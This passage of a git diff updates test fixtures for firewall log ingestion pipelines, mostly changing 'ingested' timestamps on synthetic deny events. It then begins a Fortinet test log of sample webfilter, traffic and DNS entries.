"2021-12-09T13:37:20.234243100Z" }, "tags": [ "preserve_original_event" 
@@ -582,7 +582,7 @@ }, "message": "December 15 08:13:24 emqu2846.internal.home proto=udp service=https status=deny src=10.193.233.229 dst=10.28.84.106 src_port=2859 dst_port=4844 server_app=eaqu pid=1609 app_name=uptatemU traff_direct=inbound block_count=3096 logon_user=tla@item2738.test msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875427500Z" + "ingested": "2021-12-09T13:37:20.234249300Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "December 29 15:15:58 dqu6144.api.localhost proto=ggp service=ms-wbt-server status=deny src=10.150.245.88 dst=10.210.89.183 src_port=3642 dst_port=2589 server_app=ulpa pid=6248 app_name=iusmodte traff_direct=external block_count=2700 logon_user=sequa@iosamnis1047.internal.localdomain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875431500Z" + "ingested": "2021-12-09T13:37:20.234255400Z" }, "tags": [ "preserve_original_event" @@ -606,7 +606,7 @@ }, "message": "January 12 22:18:32 giatquov1918.internal.example proto=udp service=ms-wbt-server status=deny src=10.180.195.43 dst=10.85.185.13 src_port=4540 dst_port=7793 server_app=gnaal pid=7224 app_name=proident traff_direct=outbound block_count=1867 logon_user=voluptas@orroq6677.internal.example msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875436100Z" + "ingested": "2021-12-09T13:37:20.234261900Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "January 27 05:21:06 estl5804.internal.local proto=udp service=ms-wbt-server status=deny src=10.207.211.230 dst=10.210.28.247 src_port=3449 dst_port=7257 server_app=ssecil pid=430 app_name=iuntNe traff_direct=unknown block_count=7672 logon_user=tate@onevo4326.internal.local msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875442700Z" + "ingested": "2021-12-09T13:37:20.234268200Z" }, "tags": [ "preserve_original_event" 
@@ -630,7 +630,7 @@ }, "message": "February 10 12:23:41 Sedut1775.www.domain proto=rdp service=ms-wbt-server status=deny src=10.86.11.48 dst=10.248.165.185 src_port=3436 dst_port=5460 server_app=olorsi pid=3589 app_name=exeaco traff_direct=external block_count=4801 logon_user=dquiac@itaedict7233.mail.localdomain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875448Z" + "ingested": "2021-12-09T13:37:20.234273Z" }, "tags": [ "preserve_original_event" @@ -642,7 +642,7 @@ }, "message": "February 24 19:26:15 mac7484.www5.test proto=ipv6-icmp service=http status=deny src=10.118.6.177 dst=10.47.125.38 src_port=6977 dst_port=3896 server_app=isn pid=4814 app_name=omm traff_direct=outbound block_count=1844 logon_user=quunt@numquam5869.internal.example msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875452Z" + "ingested": "2021-12-09T13:37:20.234278500Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "March 11 02:28:49 oin1140.mail.localhost proto=icmp service=pop3 status=deny src=10.50.233.155 dst=10.60.142.127 src_port=1081 dst_port=5112 server_app=urExce pid=276 app_name=nturm traff_direct=outbound block_count=2241 logon_user=atv@onu6137.api.home msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875456900Z" + "ingested": "2021-12-09T13:37:20.234284200Z" }, "tags": [ "preserve_original_event" @@ -666,7 +666,7 @@ }, "message": "March 25 09:31:24 naaliq3710.api.local proto=rdp service=http status=deny src=10.28.82.189 dst=10.120.10.211 src_port=3916 dst_port=7661 server_app=odt pid=2452 app_name=inv traff_direct=internal block_count=7705 logon_user=rcit@aecatcup2241.www5.test msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875461200Z" + "ingested": "2021-12-09T13:37:20.234294800Z" }, "tags": [ "preserve_original_event" 
@@ -678,7 +678,7 @@ }, "message": "April 8 16:33:58 volupta3552.internal.localhost proto=ipv6 service=pop3 status=deny src=10.31.237.225 dst=10.6.38.163 src_port=6153 dst_port=4059 server_app=oreveri pid=3453 app_name=avolu traff_direct=inbound block_count=2820 logon_user=olup@labor6360.mail.local msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875465800Z" + "ingested": "2021-12-09T13:37:20.234300200Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "April 22 23:36:32 onse380.internal.localdomain proto=ggp service=https status=deny src=10.226.5.189 dst=10.125.165.144 src_port=3371 dst_port=7889 server_app=dexerc pid=2302 app_name=tatem traff_direct=inbound block_count=5407 logon_user=mvolu@mveleum4322.www5.host msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875472Z" + "ingested": "2021-12-09T13:37:20.234306900Z" }, "tags": [ "preserve_original_event" @@ -702,7 +702,7 @@ }, "message": "May 7 06:39:06 queips4947.mail.example proto=udp service=smtp status=deny src=10.97.149.97 dst=10.46.56.204 src_port=2463 dst_port=5070 server_app=uela pid=7079 app_name=umf traff_direct=unknown block_count=2441 logon_user=dolorsit@archite1843.mail.home msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875481Z" + "ingested": "2021-12-09T13:37:20.234312Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "May 21 13:41:41 oloreseo5039.test proto=ggp service=https status=deny src=10.218.0.197 dst=10.28.105.124 src_port=7581 dst_port=4797 server_app=eritin pid=5773 app_name=litsedq traff_direct=outbound block_count=5749 logon_user=ntNe@itanim4024.api.example msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875489700Z" + "ingested": "2021-12-09T13:37:20.234316200Z" }, "tags": [ "preserve_original_event" 
@@ -726,7 +726,7 @@ }, "message": "June 4 20:44:15 minim459.mail.local proto=rdp service=https status=deny src=10.123.199.198 dst=10.17.87.79 src_port=6332 dst_port=3414 server_app=tionula pid=1586 app_name=ate traff_direct=outbound block_count=5006 logon_user=ratvolu@nreprehe715.api.home msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875498200Z" + "ingested": "2021-12-09T13:37:20.234320800Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "June 19 03:46:49 eratv211.api.host proto=rdp service=https status=deny src=10.38.86.177 dst=10.115.68.40 src_port=5768 dst_port=5483 server_app=boNem pid=5137 app_name=ssusci traff_direct=internal block_count=2841 logon_user=mpo@unte893.internal.host msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875506700Z" + "ingested": "2021-12-09T13:37:20.234324700Z" }, "tags": [ "preserve_original_event" @@ -750,7 +750,7 @@ }, "message": "July 3 10:49:23 aparia1179.www.localdomain proto=tcp service=https status=deny src=10.193.118.163 dst=10.115.174.107 src_port=548 dst_port=5597 server_app=acom pid=5704 app_name=dolorem traff_direct=internal block_count=10 logon_user=exeacomm@aspe951.mail.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875515200Z" + "ingested": "2021-12-09T13:37:20.234329600Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "July 17 17:51:58 iatqu6203.mail.corp proto=icmp service=http status=deny src=10.37.128.49 dst=10.77.77.208 src_port=625 dst_port=1101 server_app=esci pid=2310 app_name=essecill traff_direct=external block_count=2653 logon_user=moles@dipiscin4957.www.home msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875523900Z" + "ingested": "2021-12-09T13:37:20.234336Z" }, "tags": [ "preserve_original_event" 
@@ -774,7 +774,7 @@ }, "message": "August 1 00:54:32 ptasnula6576.api.invalid proto=tcp service=ms-wbt-server status=deny src=10.54.73.158 dst=10.1.96.93 src_port=5752 dst_port=428 server_app=docon pid=5398 app_name=ntium traff_direct=internal block_count=4392 logon_user=lloinven@econs2687.internal.localdomain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875532400Z" + "ingested": "2021-12-09T13:37:20.234349700Z" }, "tags": [ "preserve_original_event" @@ -786,7 +786,7 @@ }, "message": "August 15 07:57:06 mag1506.internal.domain proto=igmp service=smtp status=deny src=10.131.126.109 dst=10.182.152.242 src_port=1877 dst_port=6998 server_app=rcitat pid=2465 app_name=ecillum traff_direct=inbound block_count=3208 logon_user=dolor@tiumto5834.api.lan msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875540900Z" + "ingested": "2021-12-09T13:37:20.234358600Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "August 29 14:59:40 fugits1163.host proto=icmp service=http status=deny src=10.181.247.224 dst=10.77.229.168 src_port=260 dst_port=3777 server_app=atatnon pid=6064 app_name=abor traff_direct=external block_count=329 logon_user=adol@iutal6032.www.test msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875547300Z" + "ingested": "2021-12-09T13:37:20.234365100Z" }, "tags": [ "preserve_original_event" @@ -810,7 +810,7 @@ }, "message": "September 12 22:02:15 gitse2463.www5.invalid proto=ipv6-icmp service=http status=deny src=10.235.116.121 dst=10.72.162.6 src_port=1 dst_port=5516 server_app=emp pid=2861 app_name=luptas traff_direct=outbound block_count=1444 logon_user=oinv@inculp2078.host msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875552Z" + "ingested": "2021-12-09T13:37:20.234371400Z" }, "tags": [ "preserve_original_event" 
@@ -822,7 +822,7 @@ }, "message": "September 27 05:04:49 temse6953.www.example proto=ipv6-icmp service=https status=deny src=10.149.193.117 dst=10.28.124.236 src_port=5343 dst_port=3434 server_app=atcupi pid=3559 app_name=edquia traff_direct=internal block_count=3176 logon_user=mullam@mexerc2757.internal.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875556600Z" + "ingested": "2021-12-09T13:37:20.234377800Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "October 11 12:07:23 deriti6952.mail.domain proto=ipv6-icmp service=http status=deny src=10.34.131.224 dst=10.196.96.162 src_port=649 dst_port=6378 server_app=equatDu pid=1710 app_name=aconse traff_direct=outbound block_count=7174 logon_user=tnonproi@squira4455.api.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875562600Z" + "ingested": "2021-12-09T13:37:20.234384200Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "October 25 19:09:57 abor1370.www.domain proto=ipv6-icmp service=https status=deny src=10.97.236.123 dst=10.77.78.180 src_port=5159 dst_port=5380 server_app=reetdol pid=4984 app_name=ugi traff_direct=inbound block_count=4782 logon_user=nisi@emveleum3661.localhost msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875568800Z" + "ingested": "2021-12-09T13:37:20.234388800Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "November 9 02:12:32 emullamc5418.mail.test proto=ipv6 service=ms-wbt-server status=deny src=10.82.133.66 dst=10.45.54.107 src_port=7229 dst_port=3593 server_app=nse pid=3421 app_name=quira traff_direct=unknown block_count=5362 logon_user=olorem@sedquiac6517.internal.localhost msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875573200Z" + "ingested": "2021-12-09T13:37:20.234393800Z" }, "tags": [ "preserve_original_event" 
@@ -870,7 +870,7 @@ }, "message": "November 23 09:15:06 squirati7050.www5.lan proto=rdp service=pop3 status=deny src=10.180.180.230 dst=10.170.252.219 src_port=4147 dst_port=2454 server_app=tesseci pid=4020 app_name=radipis traff_direct=external block_count=7020 logon_user=nse@veniam3148.www5.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875578Z" + "ingested": "2021-12-09T13:37:20.234400200Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "December 7 16:17:40 venia2079.mail.example proto=rdp service=http status=deny src=10.5.11.205 dst=10.65.144.51 src_port=4901 dst_port=2283 server_app=lumqu pid=617 app_name=autf traff_direct=outbound block_count=5050 logon_user=uptat@unt3559.www.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875582700Z" + "ingested": "2021-12-09T13:37:20.234405800Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "December 21 23:20:14 snostrum3450.www5.localhost proto=udp service=smtp status=deny src=10.195.223.82 dst=10.76.122.196 src_port=3128 dst_port=5325 server_app=atu pid=487 app_name=iame traff_direct=external block_count=593 logon_user=umiurer@rere5274.mail.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875587200Z" + "ingested": "2021-12-09T13:37:20.234420500Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "January 5 06:22:49 gelitsed3249.corp proto=icmp service=ms-wbt-server status=deny src=10.138.210.116 dst=10.225.255.211 src_port=5595 dst_port=3369 server_app=rum pid=2442 app_name=eursinto traff_direct=external block_count=956 logon_user=fugiatn@uaeabi3728.www5.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875591200Z" + "ingested": "2021-12-09T13:37:20.234427400Z" }, "tags": [ "preserve_original_event" 
@@ -918,7 +918,7 @@ }, "message": "January 19 13:25:23 dolor7082.internal.localhost proto=icmp service=smtp status=deny src=10.250.81.189 dst=10.219.1.151 src_port=5404 dst_port=4323 server_app=redo pid=6311 app_name=ditautf traff_direct=external block_count=3262 logon_user=ori@uamqu2804.test msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875597500Z" + "ingested": "2021-12-09T13:37:20.234433200Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "February 2 20:27:57 totam6886.api.localhost proto=ggp service=https status=deny src=10.54.23.133 dst=10.76.125.70 src_port=3258 dst_port=756 server_app=oluptat pid=7128 app_name=eseruntm traff_direct=internal block_count=1916 logon_user=oloreeu@olor5201.host msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875606600Z" + "ingested": "2021-12-09T13:37:20.234438500Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "February 17 03:30:32 laborum5749.www.example proto=igmp service=http status=deny src=10.36.110.69 dst=10.189.42.62 src_port=4187 dst_port=4262 server_app=duntut pid=2780 app_name=ullamc traff_direct=unknown block_count=170 logon_user=eque@eufug3348.www.lan msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875615200Z" + "ingested": "2021-12-09T13:37:20.234443400Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "March 3 10:33:06 lup3313.api.home proto=tcp service=https status=deny src=10.47.179.68 dst=10.183.202.82 src_port=5107 dst_port=2208 server_app=usmod pid=3284 app_name=amni traff_direct=unknown block_count=2645 logon_user=umfugi@stquidol239.www5.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875623800Z" + "ingested": "2021-12-09T13:37:20.234455500Z" }, "tags": [ "preserve_original_event" 
@@ -966,7 +966,7 @@ }, "message": "March 17 17:35:40 edq5397.www.test proto=ipv6-icmp service=pop3 status=deny src=10.73.28.165 dst=10.221.206.74 src_port=3668 dst_port=1480 server_app=ihilmole pid=2314 app_name=litanim traff_direct=inbound block_count=5572 logon_user=quas@gia6531.mail.invalid msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875632200Z" + "ingested": "2021-12-09T13:37:20.234459700Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "April 1 00:38:14 udan6536.www5.test proto=ipv6 service=ms-wbt-server status=deny src=10.85.104.146 dst=10.14.204.36 src_port=3442 dst_port=4887 server_app=qua pid=5284 app_name=ents traff_direct=inbound block_count=973 logon_user=emp@lamcola4879.www5.localdomain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875640600Z" + "ingested": "2021-12-09T13:37:20.234464400Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "April 15 07:40:49 rumet6923.www5.lan proto=rdp service=https status=deny src=10.208.18.210 dst=10.30.246.132 src_port=3601 dst_port=388 server_app=texplica pid=3990 app_name=ore traff_direct=outbound block_count=5624 logon_user=veniam@edquian330.mail.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875649100Z" + "ingested": "2021-12-09T13:37:20.234469600Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "April 29 14:43:23 itse522.internal.localdomain proto=udp service=pop3 status=deny src=10.106.249.91 dst=10.19.119.17 src_port=1732 dst_port=3822 server_app=veleumi pid=4337 app_name=tvol traff_direct=unknown block_count=2783 logon_user=lit@santi837.api.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875657700Z" + "ingested": "2021-12-09T13:37:20.234475900Z" }, "tags": [ "preserve_original_event" 
@@ -1014,7 +1014,7 @@ }, "message": "May 13 21:45:57 amc3059.local proto=igmp service=http status=deny src=10.29.109.126 dst=10.181.41.154 src_port=6261 dst_port=866 server_app=itseddo pid=5275 app_name=seos traff_direct=unknown block_count=6721 logon_user=labo@lpaquiof804.internal.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875666100Z" + "ingested": "2021-12-09T13:37:20.234481100Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "May 28 04:48:31 enbyCi3813.api.domain proto=ipv6-icmp service=https status=deny src=10.164.207.42 dst=10.164.120.197 src_port=1901 dst_port=2304 server_app=itametco pid=2286 app_name=remip traff_direct=external block_count=3116 logon_user=pta@nonn4478.host msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875674600Z" + "ingested": "2021-12-09T13:37:20.234486200Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "June 11 11:51:06 liquipex1155.mail.corp proto=ipv6-icmp service=smtp status=deny src=10.183.189.133 dst=10.154.191.225 src_port=5347 dst_port=7856 server_app=Loremip pid=2990 app_name=tur traff_direct=unknown block_count=6105 logon_user=ita@amquaer3985.www5.example msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875683Z" + "ingested": "2021-12-09T13:37:20.234490600Z" }, "tags": [ "preserve_original_event" @@ -1050,7 +1050,7 @@ }, "message": "June 25 18:53:40 isn3991.local proto=igmp service=smtp status=deny src=10.29.120.226 dst=10.103.189.199 src_port=1296 dst_port=767 server_app=exerci pid=226 app_name=eserun traff_direct=outbound block_count=5452 logon_user=emu@orem6317.local msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875687400Z" + "ingested": "2021-12-09T13:37:20.234497Z" }, "tags": [ "preserve_original_event" 
@@ -1062,7 +1062,7 @@ }, "message": "July 10 01:56:14 iumtotam1010.www5.corp proto=icmp service=https status=deny src=10.133.254.23 dst=10.210.153.7 src_port=6251 dst_port=7030 server_app=nofdeFi pid=4691 app_name=sautei traff_direct=external block_count=2088 logon_user=voluptas@velill3230.www.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875693500Z" + "ingested": "2021-12-09T13:37:20.234503200Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "July 24 08:58:48 onsecte91.www5.localdomain proto=tcp service=pop3 status=deny src=10.126.245.73 dst=10.91.2.135 src_port=180 dst_port=2141 server_app=ender pid=5647 app_name=rumSecti traff_direct=outbound block_count=4680 logon_user=olore@orumS757.www5.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875699100Z" + "ingested": "2021-12-09T13:37:20.234508400Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "August 7 16:01:23 abori7686.internal.host proto=rdp service=https status=deny src=10.183.243.246 dst=10.137.85.123 src_port=218 dst_port=7073 server_app=ntsunti pid=2313 app_name=magnam traff_direct=internal block_count=6402 logon_user=cid@emi4534.www.localdomain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875705600Z" + "ingested": "2021-12-09T13:37:20.234514600Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "August 21 23:03:57 reprehen3513.test proto=ipv6 service=smtp status=deny src=10.61.225.196 dst=10.10.86.55 src_port=4720 dst_port=5132 server_app=isiu pid=1585 app_name=mmodi traff_direct=external block_count=3034 logon_user=eniamqu@inimav1576.mail.example msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875710Z" + "ingested": "2021-12-09T13:37:20.234520800Z" }, "tags": [ "preserve_original_event" 
@@ -1110,7 +1110,7 @@ }, "message": "September 5 06:06:31 orroquis284.api.domain proto=udp service=http status=deny src=10.125.143.153 dst=10.79.73.195 src_port=2657 dst_port=457 server_app=umf pid=3141 app_name=moll traff_direct=outbound block_count=7645 logon_user=emip@aturQu7083.mail.host msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875714700Z" + "ingested": "2021-12-09T13:37:20.234526900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "September 19 13:09:05 tionula2060.www5.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.240.216.85 dst=10.64.139.17 src_port=2046 dst_port=2438 server_app=ice pid=6331 app_name=aal traff_direct=external block_count=4982 logon_user=nimadmin@lumqui7769.mail.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875718900Z" + "ingested": "2021-12-09T13:37:20.234533100Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "October 3 20:11:40 rumSecti111.www5.domain proto=ipv6 service=ms-wbt-server status=deny src=10.87.90.49 dst=10.222.245.80 src_port=1486 dst_port=4017 server_app=itaedict pid=4474 app_name=byCic traff_direct=inbound block_count=3380 logon_user=ptatemse@siarc6339.internal.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875723700Z" + "ingested": "2021-12-09T13:37:20.234539300Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "October 18 03:14:14 olores7881.local proto=udp service=pop3 status=deny src=10.143.53.214 dst=10.87.144.208 src_port=3310 dst_port=2440 server_app=ipsumq pid=4855 app_name=psaquaea traff_direct=unknown block_count=5772 logon_user=psumq@ptatev6552.www.test msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875727700Z" + "ingested": "2021-12-09T13:37:20.234545400Z" }, "tags": [ "preserve_original_event" 
@@ -1158,7 +1158,7 @@ }, "message": "November 1 10:16:48 tDuis3281.www5.localdomain proto=ipv6-icmp service=pop3 status=deny src=10.204.178.19 dst=10.105.97.134 src_port=616 dst_port=1935 server_app=oremque pid=1729 app_name=inimve traff_direct=unknown block_count=6564 logon_user=mexercit@byC5766.internal.home msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875734600Z" + "ingested": "2021-12-09T13:37:20.234551700Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "November 15 17:19:22 uptasnul2751.www5.corp proto=rdp service=smtp status=deny src=10.161.64.168 dst=10.194.67.223 src_port=7154 dst_port=5767 server_app=tatemse pid=4493 app_name=amqui traff_direct=inbound block_count=3673 logon_user=tion@hender6628.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875758900Z" + "ingested": "2021-12-09T13:37:20.234558Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "November 30 00:21:57 upt6017.api.localdomain proto=tcp service=smtp status=deny src=10.100.154.220 dst=10.120.148.241 src_port=5535 dst_port=1655 server_app=eeufug pid=6094 app_name=modt traff_direct=external block_count=5150 logon_user=rsitam@xercit7649.www5.home msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875766600Z" + "ingested": "2021-12-09T13:37:20.234564100Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "December 14 07:24:31 tpers2217.internal.lan proto=udp service=ms-wbt-server status=deny src=10.116.153.19 dst=10.180.90.112 src_port=6610 dst_port=1936 server_app=olu pid=5012 app_name=dexercit traff_direct=outbound block_count=2216 logon_user=itessequ@porissu1470.domain msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875781100Z" + "ingested": "2021-12-09T13:37:20.234570600Z" }, "tags": [ "preserve_original_event" 
diff --git a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log
index 4a6606ea21c..ee983a59106 100644
--- a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log
+++ b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log
@@ -1,35 +1,35 @@ -<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony" -<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=8.8.8.8 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" -<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based 
Email" -<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" -<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" -<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" -<189>date=2020-04-23 time=12:17:29 
devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" -<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" -<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access" -<190>date=2020-04-23 